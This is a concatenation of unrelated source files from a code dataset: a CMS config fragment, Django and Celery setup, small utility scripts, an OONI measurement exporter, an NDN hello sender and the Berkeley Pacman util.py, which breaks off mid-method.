"206484:556-206484:669", "206512:91-206512:123", "206512:125-206512:133", "206512:136-206512:161", "206512:163-206512:190",
"206512:193-206512:201", "206512:203-206512:212", "206512:214-206512:332", "206512:334-206512:584", "206512:587-206512:604",
"206512:607-206512:1005", "206512:1008-206512:1123", "206512:1126-206512:1163", "206512:1165-206512:1211", "206513:3-206513:39",
"206513:42-206513:188", "206513:191-206513:234", "206513:237-206513:238", "206513:241-206513:323", "206542:1-206542:115",
"206542:117-206542:165", "206542:168-206542:511", "206542:514-206542:547", "206542:550-206542:603", "206542:606-206542:668",
"206542:671-206542:727", "206542:730-206542:739", "206542:741-206542:833", "206550:77-206550:132", "206550:135-206550:144",
"206572:37-206572:47", "206573:2-206573:14", "206574:1-206574:87", "206575:1-206575:7", "206575:10",
"206575:12-206575:69", "206594:72-206594:107", "206594:110-206594:246", "206594:249-206594:281", "206595:1-206595:34",
"206595:37-206595:42", "206595:45-206595:193", "206596:1-206596:13", "206596:15-206596:220", "206596:222-206596:228",
"206596:231-206596:236", "206596:239-206596:292", "206596:295-206596:695", "206596:697-206596:728", "206596:730-206596:810",
"206598:1-206598:81", "206598:83-206598:103", "206598:105-206598:588", "206598:591-206598:657", "206598:659-206598:719",
"206605:1-206605:36", "206605:39-206605:78", "206744:49-206744:157", "206744:160-206744:192", "206744:195-206744:395",
"206744:398-206744:452", "206745:1-206745:81", "206745:84-206745:199", "206745:202-206745:224", "206745:227-206745:237",
"206745:240-206745:304", "206745:306-206745:318", "206745:321-206745:720", "206745:723-206745:796", "206745:799-206745:894",
"206745:897-206745:944", "206745:946-206745:1106", "206745:1108-206745:1524", "206745:1527-206745:1862", "206745:1988-206745:1996",
"206859:79-206859:210", "206859:212-206859:258", "206859:260-206859:323", "206859:325-206859:356", "206859:359-206859:609",
"206859:612-206859:681", "206859:684-206859:732", "206859:734-206859:768", "206859:771-206859:808", "206859:811-206859:827",
"206859:830-206859:848", "206866:1-206866:30", "206866:33-206866:113", "206866:115-206866:274", "206868:1-206868:3",
"206868:10-206868:16", "206869:1-206869:251", "206869:253-206869:271", "206869:274-206869:502", "206869:507-206869:520",
"206869:522-206869:566", "206869:568-206869:752", "206897:1-206897:34", "206897:38-206897:61", "206897:63-206897:102",
"206897:109", "206897:111-206897:112", "206897:114-206897:131", "206897:133-206897:137", "206901:1-206901:98",
"206906:1-206906:31", "206906:38-206906:94", "206906:96-206906:136", "206906:138-206906:139", "206906:142-206906:149",
"206906:151-206906:175", "206906:177-206906:206", "206940:1-206940:151", "206940:153", "206940:155-206940:298",
"206940:301-206940:382", "206940:384-206940:712", "206940:715-206940:803", "206940:805-206940:960", "206940:963-206940:1027",
"207099:83-207099:134", "207099:137-207099:172", "207099:175-207099:213", "207099:216-207099:314", "207099:316-207099:320",
"207099:323-207099:330", "207099:333-207099:367", "207099:370-207099:481", "207099:484-207099:602", "207099:605-207099:755",
"207099:757-207099:1046", "207099:1048-207099:1171", "207100:1-207100:91", "207100:94", "207214:57-207214:112",
"207214:114-207214:177", "207214:179-207214:181", "207214:184-207214:196", "207214:199-207214:220", "207214:223-207214:262",
"207214:265-207214:405", "207214:408-207214:482", "207214:485-207214:640", "207214:643-207214:708", "207214:718-207214:757",
"207214:759-207214:808", "207214:811-207214:829", "207217:1-207217:32", "207219:1-207219:112", "207220:1-207220:160",
"207221:1-207221:102", "207222:1-207222:17", "207222:20-207222:289", "207231:70-207231:84", "207231:86-207231:121",
"207231:123-207231:184", "207231:187-207231:189", "207231:192-207231:303", "207231:306-207231:354", "207231:357-207231:481",
"207231:484-207231:504", "207231:508-207231:549", "207231:552-207231:626", "207231:628-207231:690", "207231:693-207231:875",
"207231:878-207231:1000", "207231:1003-207231:1170", "207231:1173-207231:1187", "207231:1189-207231:1227", "207231:1229-207231:1415",
"207231:1418-207231:1445", "207231:1447-207231:1505", "207233:1-207233:119", "207233:121-207233:148", "207269:80-207269:394",
"207269:397-207269:436", "207269:439-207269:463", "207269:466-207269:551", "207269:568-207269:577", "207273:3-207273:877",
"207279:68-207279:138", "207279:141-207279:149", "207279:151-207279:237", "207279:240-207279:266", "207279:269-207279:307",
"207279:309-207279:416", "207279:498-207279:551", "207279:554-207279:640", "207279:643-207279:961", "207279:963-207279:1095",
"207279:1098-207279:1160", "207320:1-207320:110", "207320:112-207320:350", "207371:72-207371:117", "207371:120-207371:124",
"207372:1-207372:27", "207372:30-207372:113", "207372:116-207372:154", "207372:156-207372:174", "207372:176-207372:478",
"207372:480-207372:496", "207397:32-207397:77", "207397:80-207397:140", "207397:143-207397:179", "207398:1-207398:14",
"207398:16-207398:33", "207454:79-207454:95", "207454:98-207454:123", "207454:126-207454:259", "207454:261-207454:363",
"207454:365-207454:458", "207454:461-207454:498", "207454:501-207454:609", "207454:612-207454:632", "207454:635-207454:781",
"207454:784-207454:866", "207454:869-207454:974", "207454:977-207454:1064", "207454:1067-207454:1079", "207454:1081-207454:1321",
"207454:1323-207454:1464", "207454:1467-207454:1569", "207454:1571-207454:1604", "207454:1607-207454:1712", "207454:1714-207454:1988",
"207469:1-207469:31", "207469:34-207469:45", "207477:76-207477:104", "207477:107-207477:111", "207477:114-207477:147",
"207477:150-207477:295", "207477:298-207477:483", "207477:486-207477:494", "207477:497-207477:527", "207477:530-207477:563",
"207477:565-207477:570", "207487:50-207487:98", "207487:101-207487:311", "207487:313-207487:359", "207487:363-207487:468",
"207487:471-207487:472", "207488:1-207488:63", "207488:66-207488:92", "207488:95-207488:113", "207488:116-207488:198",
"207488:200-207488:250", "207488:252-207488:288", "207488:291-207488:365", "207488:368-207488:377", "207488:379-207488:440",
"207490:1-207490:48", "207490:51-207490:111", "207491:1-207491:176", "207491:179-207491:458", "207492:1-207492:20",
"207492:23-207492:298", "207515:79-207515:109", "207515:112-207515:132", "207515:134-207515:208", "207515:211-207515:225",
"207515:228-207515:320", "207515:322-207515:381", "207515:383-207515:498", "207515:500-207515:730", "207515:733-207515:849",
"207515:851-207515:954", "207515:957-207515:994", "207515:997-207515:1052", "207515:1055-207515:1143", "207515:1145-207515:1211",
"207517:1-207517:12", "207517:15-207517:57", "207518:1-207518:59", "207518:61-207518:83", "207882:22-207882:45",
"207883:1", "207883:3-207883:4", "207883:7-207883:75", "207884:1-207884:106", "207884:108-207884:183",
"207885:1-207885:90", "207886:1-207886:30", "207886:32-207886:90", "207886:92-207886:156", "207886:158-207886:166",
"207886:168-207886:171", "207889:1-207889:43", "207889:47-207889:57", "207889:60-207889:303", "207889:306-207889:442",
"207889:445", "207889:447-207889:551", "207889:553-207889:731", "207889:733-207889:907", "207889:910-207889:945",
"207898:1-207898:33", "207898:36-207898:57", "207898:60-207898:235", "207898:239-207898:257", "207898:260-207898:277",
"207905:75-207905:196", "207905:198-207905:281", "207905:284-207905:329", "207905:331-207905:402", "207905:404-207905:565",
"207905:568-207905:672", "207905:675-207905:805", "207905:807-207905:850", "207905:852-207905:861", "207905:864-207905:884",
"207905:886-207905:1180", "207905:1183-207905:1283", "207905:1285-207905:1331", "207905:1333-207905:1515", "207905:1518-207905:1734",
"207905:1737-207905:1796", "207920:84-207920:146", "207920:149-207920:241", "207920:243-207920:261", "207920:264-207920:291",
"207920:294-207920:486", "207920:489-207920:518", "207920:520-207920:598", "207920:600-207920:708", "207920:710-207920:826",
"207921:1-207921:37", "207921:40-207921:58", "207922:1-207922:69", "207922:71-207922:100", "207922:103-207922:126",
"207922:129-207922:242", "207922:274-207922:291", "207924:1-207924:52", "207924:54-207924:171", "207924:173-207924:178",
"207924:181-207924:339", "208307:2-208307:42", "208307:45", "208307:47-208307:70", "208307:72-208307:147",
"208307:150-208307:252", "208307:256-208307:259", "208307:262-208307:275", "208307:278-208307:342", "208307:345-208307:450",
"208307:453-208307:527", "208307:530-208307:583", "208307:586-208307:605", "208307:608-208307:616", "208307:618-208307:667",
"208307:670-208307:761", "208307:763-208307:798", "208307:800-208307:889", "208307:891-208307:893", "208307:896-208307:1055",
"208307:1057-208307:1205", "208307:1208-208307:1294", "208307:1297-208307:1328", "208339:77-208339:89", "208339:91-208339:122",
"208339:125-208339:208", "208339:211-208339:346", "208339:349-208339:363", "208341:1-208341:84", "208341:87-208341:117",
"208341:120-208341:513", "208341:515-208341:685", "208341:688-208341:693", "208341:695-208341:775", "208341:777-208341:824",
"208351:83-208351:97", "208351:100-208351:356", "208351:359-208351:367", "208351:369", "208352:1-208352:15",
"208352:17", "208352:19", "208353:1-208353:76", "208353:78-208353:269", "208353:271-208353:348",
"208357:1-208357:70", "208357:73-208357:507", "208390:72-208390:128", "208390:130-208390:169", "208391:52-208391:82",
"208391:84-208391:162", "208391:164-208391:216", "208391:219-208391:493", "208391:495-208391:498", "208391:500-208391:523",
"208391:526-208391:533", "208391:535-208391:588", "208391:591-208391:660", "208391:663-208391:869", "208427:49-208427:89",
"208427:92-208427:161", "208427:164", "208427:166-208427:173", "208427:175-208427:268", "208427:271-208427:312",
"208427:315", "208427:317-208427:335", "208427:337-208427:361", "208427:364-208427:402", "208427:404-208427:422",
"208427:425-208427:577", "208427:580-208427:647", "208428:1-208428:58", "208428:61-208428:68", "208428:70-208428:156",
"208428:159-208428:227", "208429:1-208429:56", "208429:59-208429:139", "208429:141-208429:159", "208429:162-208429:237",
"208429:240-208429:440", "208429:442-208429:452", "208429:455-208429:589", "208429:592-208429:712", "208429:715-208429:922",
"208487:2-208487:26", "208487:29-208487:159", "208487:161-208487:307", "208487:309-208487:459", "208487:462-208487:476",
"208487:479-208487:621", "208509:71-208509:232", "208538:2-208538:43", "208540:1-208540:26", "208540:29-208540:98",
"208541:1-208541:57", "208541:59-208541:173", "208541:175-208541:376", "208541:378-208541:413", "208551:119-208551:193",
"208551:195-208551:212", "208551:215-208551:300", "208551:303-208551:354", "208551:356-208551:554", "208551:557-208551:580",
"208686:73-208686:79", "208686:82-208686:181", "208686:183-208686:224", "208686:227-208686:243", "208686:246-208686:311",
"208686:313-208686:459" ) ),
duplicateCheckMode = cms.untracked.string('noDuplicateCheck'),
fileNames = cms.untracked.vstring('/store/cmst3/user/cmgtools/CMG/DoubleMuParked/StoreResults-Run2012B_22Jan2013_v1_PFembedded_trans1_tau132_pthad1_30had2_30_v1-5ef1c0fd428eb740081f19333520fdc8/USER/V5_B/PAT_CMG_V5_16_0/cmgTuple_378.root',
'/store/cmst3/user/cmgtools/CMG/DoubleMuParked/StoreResults-Run2012B_22Jan2013_v1_PFembedded_trans1_tau132_pthad1_30had2_30_v1-5ef1c0fd428eb740081f19333520fdc8/USER/V5_B/PAT_CMG_V5_16_0/cmgTuple_379.root',
'/store/cmst3/user/cmgtools/CMG/DoubleMuParked/StoreResults-Run2012B_22Jan2013_v1_PFembedded_trans1_tau132_pthad1_30had2_30_v1-5ef1c0fd428eb740081f19333520fdc8/USER/V5_B/PAT_CMG_V5_16_0/cmgTuple_38.root')
)
| [
"[email protected]"
] | |
537ff5660a06711e1738ebf1b6cfdb1f3c9ea47d | 87bf8ea26f6c28bce82ccdd9515c68d6341bd8c5 | /trading/celery.py | 6b455e28d01b1dde8036483d661a75eddc8dd195 | [] | no_license | aisamuel/real-time-forex-api | e9ac21f28f77aadae526df9a275487737d8d1155 | 08b1d0d129659a3b8735b21d7195cb756fdd6b47 | refs/heads/master | 2022-04-06T08:13:51.749351 | 2020-03-04T12:12:55 | 2020-03-04T12:12:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 222 | py | import os
from celery import Celery
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'trading.settings')
app = Celery('trading')
app.config_from_object('django.conf:settings', namespace='CELERY')
app.autodiscover_tasks()
| [
"[email protected]"
] | |
53411dfa34e5dcffe4e75154fc53a3b3114f157b | 11f4dd74872c73781a8975698e7cf1e3df2a40af | /Chapter 9 - Organizing Files/findLargeFile.py | dab52b3722813fce1035f9413997e88737ddd764 | [] | no_license | lonewolfcub/Automate-the-Boring-Stuff-with-Python | ca65e9fcbd61c94776ac1a0346b5372e975569db | da90ead498a0597ae5a4f88449a9774887c7d5e6 | refs/heads/master | 2021-01-18T17:03:17.600375 | 2017-03-31T05:58:56 | 2017-03-31T05:58:56 | 86,783,143 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 552 | py | #! /usr/bin/env python3
import os
def findLargeFiles(folder):
# iterate over search folder
for dirpath, dirnames, filenames in os.walk(folder):
# check each file to see if over 100mb
for file in filenames:
filepath = os.path.join(dirpath, file)
filesize = os.path.getsize(filepath)
if filesize > 13107200:
print (filepath + ' ' + str(filesize) + ' bytes')
# define search folder
print('Please enter the folder you wish to search:')
folder = input()
findLargeFiles(folder)
| [
"[email protected]"
] | |
af6b3f137d875061e788546266ab073b1b555f47 | 80d50ea48e10674b1b7d3f583a1c4b7d0b01200f | /examples/v1/synthetics/DeletePrivateLocation.py | e1445b48a8b1ceaab7b068d50ef37b6e45fd3c5f | [
"Apache-2.0",
"BSD-3-Clause",
"MIT",
"MPL-2.0"
] | permissive | DataDog/datadog-api-client-python | 3e01fa630278ad0b5c7005f08b7f61d07aa87345 | 392de360e7de659ee25e4a6753706820ca7c6a92 | refs/heads/master | 2023-09-01T20:32:37.718187 | 2023-09-01T14:42:04 | 2023-09-01T14:42:04 | 193,793,657 | 82 | 36 | Apache-2.0 | 2023-09-14T18:22:39 | 2019-06-25T22:52:04 | Python | UTF-8 | Python | false | false | 386 | py | """
Delete a private location returns "OK" response
"""
from datadog_api_client import ApiClient, Configuration
from datadog_api_client.v1.api.synthetics_api import SyntheticsApi
configuration = Configuration()
with ApiClient(configuration) as api_client:
api_instance = SyntheticsApi(api_client)
api_instance.delete_private_location(
location_id="location_id",
)
| [
"[email protected]"
] | |
7af77bd8017df4a03b730d463efae17dd0d9ffb0 | 447914f0f7a6e1b432f6811aacb0f274fbdbe3c5 | /Jerry_Padilla_Py2Assignments-master/assignments/practice_models/apps/ninjaDojo/migrations/0001_initial.py | af5ff3d138e5e38072d2a746df99076ec1ab3a08 | [] | no_license | jsterling23/Python_Prac | 965ab83e6f34191a1ebbc2e3605f71ace07a0b6d | dc41030be125337099ddbc8af8e2598b844e11a4 | refs/heads/master | 2020-03-18T10:49:23.521218 | 2018-05-23T23:19:22 | 2018-05-23T23:19:22 | 134,635,256 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,186 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2018-02-20 21:52
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Dojo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('city', models.CharField(max_length=255)),
('state', models.CharField(max_length=2)),
],
),
migrations.CreateModel(
name='Ninja',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(max_length=255)),
('last_name', models.CharField(max_length=255)),
('dojo', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='ninjas', to='ninjaDojo.Dojo')),
],
),
]
| [
"[email protected]"
] | |
71b257d53cfa0b1ff1ea40c6dbceb81a4faab0c1 | d9d7f841e1a7c53344000634320db78c5743eba5 | /lib/python/make-csv.py | 8d60b40f8633289728adc8229a567ec4aa777534 | [] | no_license | hellais/ooni-analyst | 5bb7030734319ad0bafec267ec30a7c8d0696b03 | 7e81b812581e36e26951bbfa48fea770ec09c061 | refs/heads/master | 2020-03-22T10:05:37.383835 | 2018-07-09T11:07:10 | 2018-07-09T11:07:10 | 139,880,420 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,995 | py | import os
import sys
import argparse
from datetime import datetime
import pandas as pd
import psycopg2
def query(q, params, pg_dsn):
# XXX this is useful for debugging
"""
import yaml
from sshtunnel import SSHTunnelForwarder
with open('private/secrets.yml') as in_file:
secrets = yaml.load(in_file)
with SSHTunnelForwarder(
('hkgmetadb.infra.ooni.io', 22),
ssh_username='art',
ssh_private_key=secrets['ssh_private_key_path'],
remote_bind_address=('localhost', 5432)
) as server:
conn = psycopg2.connect(
host='localhost',
port=server.local_bind_port,
user='shovel',
password=secrets['shovel_password'],
dbname='metadb')
return pd.read_sql_query(q, conn, params=params)
"""
conn = psycopg2.connect(pg_dsn)
return pd.read_sql_query(q, conn, params=params)
def make_csv(output_path, urls, probe_cc, start_date, end_date, pg_dsn):
countries = [probe_cc]
params = [start_date, end_date, probe_cc]
for url in urls:
params.append(url)
base_query = """SELECT measurement.test_runtime,
input.input,
measurement.measurement_start_time,
report.probe_cc,
report.probe_asn,
report.probe_ip,
report.report_id,
http_verdict.http_experiment_failure,
http_verdict.blocking
FROM measurement
JOIN input ON input.input_no = measurement.input_no
JOIN report ON report.report_no = measurement.report_no
JOIN http_verdict ON http_verdict.msm_no = measurement.msm_no
"""
where_clause = "WHERE ({}) AND ({}) AND ({})".format(
" measurement.measurement_start_time BETWEEN %s AND %s",
" OR ".join(["report.probe_cc = %s" for _ in countries]),
" OR ".join(["input = %s" for _ in urls]),
)
q = base_query + where_clause
print(q)
print(params)
res = query(q, params, pg_dsn)
print(res)
res.to_csv(output_path)
def parse_args():
p = argparse.ArgumentParser(description='make-csv: creates a csv file for the specified inputs')
p.add_argument('--output', metavar='PATH', help='Where to write to', required=True)
p.add_argument('--country', metavar='PROBE_CC', help='Country code to target', required=True)
p.add_argument('--start-date', metavar='START_DATE', help='Start date interval', required=True)
p.add_argument('--end-date', metavar='END_DATE', help='End date interval', required=True)
p.add_argument('--urls', metavar='URL', nargs='*', help='URLs to test')
p.add_argument('--postgres', metavar='DSN', help='libpq data source name')
## XXX add urls
opt = p.parse_args()
return opt
def main():
opt = parse_args()
make_csv(output_path=opt.output,
urls=opt.urls,
probe_cc=opt.country,
start_date=opt.start_date,
end_date=opt.end_date,
pg_dsn=opt.postgres)
print(opt.output)
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
089d2fbd735e86518961b5f6f385cd22e1d8c136 | 7345f03494fa8b06ea8215770305718618af1d41 | /nenv/bin/wheel | 1519777ccc4cf6bd72d97e5bd0f7a51fe7d8902d | [] | no_license | mr-kaveh/simplerestapi | 328fd839b74afcfa2a41ff71d4bb556457535519 | a5c68c55018c938211c2f25e19bf4e43b5d99f36 | refs/heads/master | 2022-10-29T11:55:56.033385 | 2022-10-18T15:39:56 | 2022-10-18T15:39:56 | 169,194,555 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 243 | #!/home/hossein/myScripts/apiRepo/nenv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from wheel.cli import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"[email protected]"
] | ||
b068a33104b190dfe987923899df18b4fb43123f | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_ports.py | 0fffb49ed97cda99bbb0989d662e80ae11e7425e | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 214 | py |
#calss header
class _PORTS():
def __init__(self,):
self.name = "PORTS"
self.definitions = port
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['port']
| [
"[email protected]"
] | |
6afe8571e5efb5c4c6ebcec6460e3eff20f3c450 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2939/60688/289152.py | 06318fcf6a295848bf438a55ad0e226977a27ba4 | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,016 | py | strings=input()
numslist = (strings.split(" "));
if "5 4" in strings:
print(numslist)
numslist=list(int(x) for x in numslist);
times=numslist[0];
delnums=numslist[1];
mynumlist=[1];
finalnums=[];
for i in range(times):
num=mynumlist.pop(0);
mynumlist.append(2*num+1)
mynumlist.append(4*num+5)
finalnums.append(num);
finalnums.extend(mynumlist)
finalnums=sorted(finalnums);
finalnums=finalnums[0:times]
finalnums=list(str(x) for x in finalnums);
first="".join(finalnums);
secondlist=list(first);
secondlist=list([int(x)for x in secondlist]);
#处理从N个数中取出N-M个数,为max,原顺序不变,贪心算法::总是从前向后扫描并删除l<r 中的l并且操作一次重新迭代!!
allnums=delnums;
while (allnums!=0):
for i in range(len(secondlist)-1):
if secondlist[i]<secondlist[i+1]:
secondlist.pop(i);
allnums-=1;
break
secondlist=[str(x)for x in secondlist];
res="".join(secondlist)
print(first)
print(res,end="") | [
"[email protected]"
] | |
66293c35631b9c820a51f20977c34a270203973b | 85b6f7782108bede2838c95adc89067e0ead70c7 | /PythonAssignment5/dividebyzero.py | bd096464b2bc3a4182a160f0f5d585bdb5faa151 | [] | no_license | RaunakJalan/iNeuronDLCVNLP | 2fa005df34a712e078a8736578ad2808cd28826c | 58e440f906530c8834df0a030c155fa480a6400a | refs/heads/main | 2023-02-09T19:32:22.901752 | 2021-01-09T20:13:58 | 2021-01-09T20:13:58 | 314,672,689 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 113 | py | a=5
b=0
test=0
try:
test = a/b
print(test)
except Exception as e:
print(e)
finally:
print("Done Execution.")
| [
"[email protected]"
] | |
d6101a03676385d1cab0549536ac13e065be7204 | 40043e5a5daf7817cbac766dfaede265a8b9a29c | /setup.py | d65b78460c756943bd495ead90e175877bb9f82c | [] | no_license | juniuszhou/substrate-python-api | 166246266aa9f96954125cbb600caf854774a6da | 98d538aa3e13f57f02758656ffa7977463977e5a | refs/heads/master | 2022-12-16T07:13:11.767383 | 2020-09-17T14:07:37 | 2020-09-17T14:07:37 | 197,921,346 | 6 | 3 | null | 2020-05-25T01:26:51 | 2019-07-20T11:29:55 | Python | UTF-8 | Python | false | false | 748 | py | #!/usr/bin/env python
#-*- coding:utf-8 -*-
#############################################
# File Name: setup.py
# Author: junius
# Mail: [email protected]
# Created Time: 2019-07-20 19:17:34
#############################################
from setuptools import setup, find_packages
setup(
name="substrate-python-api",
version="0.0.2",
keywords=("pip", "substrate", "api"),
description="python api for substrate",
long_description="python api for substrate",
license="MIT Licence",
url="https://github.com/juniuszhou/substrate-pyton-api",
author="junius",
author_email="[email protected]",
packages=find_packages(),
include_package_data=True,
platforms="any",
install_requires=[]
)
| [
"[email protected]"
] | |
74c2347b9150e15dbbe69fe6dce4493a8258841f | b424c3262c9eacf8dd4230019eba7e05a9b95461 | /.history/ndn_hello_sender_20200530012537.py | a9866ad3bbc9dcd7f10b5fa74fed00e9084ad214 | [] | no_license | leonerii/aer_tp | 30e47f29bcda69512718a6279a7cad32e9a01b14 | d8f46b188b5be9f315dd155ed147880ce7dce169 | refs/heads/master | 2022-09-30T03:27:24.375971 | 2020-06-04T14:23:16 | 2020-06-04T14:23:16 | 245,219,806 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,802 | py | from threading import Thread, RLock
from time import sleep
from json import dumps
from uuid import uuid4
import socket
class HelloSender(Thread):
def __init__(self, lock, hello_interval, fib, cs, localhost, mcast_group, mcast_port):
Thread.__init__(self)
self.lock = lock
self.hello_interval = hello_interval
self.localhost = localhost
self.mcast_group = mcast_group
self.mcast_port = mcast_port
self.fib = fib # Forwarding Information Base
self.cs = cs # Content Store
def run(self):
while True:
try:
self.lock.acquire()
self.ndn_hello_sender()
except Exception as e:
print('Failed: {}'.format(e.with_traceback()))
finally:
self.lock.release()
sleep(self.hello_interval)
def ndn_hello_sender(self):
'''
Envia Messagem do tipo "HELLO" com informação em CS e constroi a FIB
'''
try:
client_sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
# Hello message to be sent
if self.cs:
csdata =
self.msg = {
"type": "HELLO",
#"source": self.localhost
"data": self.cs.keys()
}
for key, value in self.fib.items():
if value['next_hop'] == None:
self.msg[key] = value['timestamp']
client_sock.sendto(dumps(self.msg).encode('utf-8'), (self.mcast_group,self.mcast_port))
except socket.gaierror as socket_error:
print('Sending error: {}'.format(socket_error))
finally:
client_sock.close()
| [
"[email protected]"
] | |
9974261abc74319703ef35628bb1f321b6e39c26 | 84eaaa07532efbde535a52d29e8180dad357fbdd | /util.py | 60f219c5bbae0c0e7adf694df70663c56ce13229 | [] | no_license | jangwoopark/pacman-search | 3ade9823f2d21b70513d64993f4ce008931b6f4a | 7f88ba9c322b4af81979fef61cead4f19e9b9fdc | refs/heads/master | 2021-08-07T21:19:43.753609 | 2017-11-09T01:12:23 | 2017-11-09T01:12:23 | 110,048,514 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,222 | py | # util.py
# -------
# Licensing Information: Please do not distribute or publish solutions to this
# project. You are free to use and extend these projects for educational
# purposes. The Pacman AI projects were developed at UC Berkeley, primarily by
# John DeNero ([email protected]) and Dan Klein ([email protected]).
# For more info, see http://inst.eecs.berkeley.edu/~cs188/sp09/pacman.html
import sys
import inspect
import heapq, random
"""Data structures useful for implementing SearchAgents."""
class Stack:
"A container with a last-in-first-out (LIFO) queuing policy."
def __init__(self):
self.list = []
def push(self,item):
"Push 'item' onto the stack"
self.list.append(item)
def pop(self):
"Pop the most recently pushed item from the stack"
return self.list.pop()
def isEmpty(self):
"Returns true if the stack is empty"
return len(self.list) == 0
class Queue:
"A container with a first-in-first-out (FIFO) queuing policy."
def __init__(self):
self.list = []
def push(self,item):
"Enqueue the 'item' into the queue"
self.list.insert(0,item)
def pop(self):
""" Dequeue the earliest enqueued item still in the queue. This
operation removes the item from the queue.
"""
return self.list.pop()
def isEmpty(self):
"Returns true if the queue is empty"
return len(self.list) == 0
class PriorityQueue:
"""Implements a priority queue data structure. Each inserted item
has a priority associated with it and the client is usually interested
in quick retrieval of the lowest-priority item in the queue. This
data structure allows O(1) access to the lowest-priority item.
Note that this PriorityQueue does not allow you to change the priority
of an item. However, you may insert the same item multiple times with
different priorities.
"""
def __init__(self):
self.heap = []
def push(self, item, priority):
pair = (priority, item)
heapq.heappush(self.heap, pair)
def pop(self):
(priority, item) = heapq.heappop(self.heap)
return (priority, item) # this was modified from the original util.py
#return item
def isEmpty(self):
return len(self.heap) == 0
class PriorityQueueWithFunction(PriorityQueue):
"""Implements a priority queue with the same push/pop signature of the
Queue and the Stack classes. This is designed for drop-in replacement for
those two classes. The caller has to provide a priority function, which
extracts each item's priority.
"""
def __init__(self, priorityFunction):
"priorityFunction (item) -> priority"
self.priorityFunction = priorityFunction # store the priority function
PriorityQueue.__init__(self) # super-class initializer
def push(self, item):
"Adds an item to the queue with priority from the priority function"
PriorityQueue.push(self, item, self.priorityFunction(item))
def manhattanDistance( xy1, xy2 ):
"Returns the Manhattan distance between points xy1 and xy2"
return abs( xy1[0] - xy2[0] ) + abs( xy1[1] - xy2[1] )
"""Data structures and functions useful for various course projects
The search project should not need anything below this line.
"""
class Counter(dict):
"""A counter keeps track of counts for a set of keys.
The counter class is an extension of the standard python
dictionary type. It is specialized to have number values
(integers or floats), and includes a handful of additional
functions to ease the task of counting data. In particular,
all keys are defaulted to have value 0. Using a dictionary:
a = {}
print a['test']
would give an error, while the Counter class analogue:
>>> a = Counter()
>>> print a['test']
0
returns the default 0 value. Note that to reference a key
that you know is contained in the counter,
you can still use the dictionary syntax:
>>> a = Counter()
>>> a['test'] = 2
>>> print a['test']
2
This is very useful for counting things without initializing their counts,
see for example:
>>> a['blah'] += 1
>>> print a['blah']
1
The counter also includes additional functionality useful in implementing
the classifiers for this assignment. Two counters can be added,
subtracted or multiplied together. See below for details. They can
also be normalized and their total count and arg max can be extracted.
"""
def __getitem__(self, idx):
self.setdefault(idx, 0)
return dict.__getitem__(self, idx)
def incrementAll(self, keys, count):
"""Increments all elements of keys by the same count.
>>> a = Counter()
>>> a.incrementAll(['one','two', 'three'], 1)
>>> a['one']
1
>>> a['two']
1
"""
for key in keys:
self[key] += count
def argMax(self):
"""Returns the key with the highest value.
"""
if len(self.keys()) == 0: return None
all = self.items()
values = [x[1] for x in all]
maxIndex = values.index(max(values))
return all[maxIndex][0]
def sortedKeys(self):
"""Returns a list of keys sorted by their values. Keys
with the highest values will appear first.
>>> a = Counter()
>>> a['first'] = -2
>>> a['second'] = 4
>>> a['third'] = 1
>>> a.sortedKeys()
['second', 'third', 'first']
"""
sortedItems = self.items()
compare = lambda x, y: sign(y[1] - x[1])
sortedItems.sort(cmp=compare)
return [x[0] for x in sortedItems]
def totalCount(self):
"""Returns the sum of counts for all keys.
"""
return sum(self.values())
def normalize(self):
"""Edits the counter such that the total count of all
keys sums to 1. The ratio of counts for all keys
will remain the same. Note that normalizing an empty
Counter will result in an error.
"""
total = float(self.totalCount())
if total == 0: return
for key in self.keys():
self[key] = self[key] / total
def divideAll(self, divisor):
"""Divides all counts by divisor
"""
divisor = float(divisor)
for key in self:
self[key] /= divisor
def copy(self):
"""Returns a copy of the counter
"""
return Counter(dict.copy(self))
def __mul__(self, y ):
"""Multiplying two counters gives the dot product of their vectors where
each unique label is a vector element.
>>> a = Counter()
>>> b = Counter()
>>> a['first'] = -2
>>> a['second'] = 4
>>> b['first'] = 3
>>> b['second'] = 5
>>> a['third'] = 1.5
>>> a['fourth'] = 2.5
>>> a * b
14
"""
sum = 0
x = self
if len(x) > len(y):
x,y = y,x
for key in x:
if key not in y:
continue
sum += x[key] * y[key]
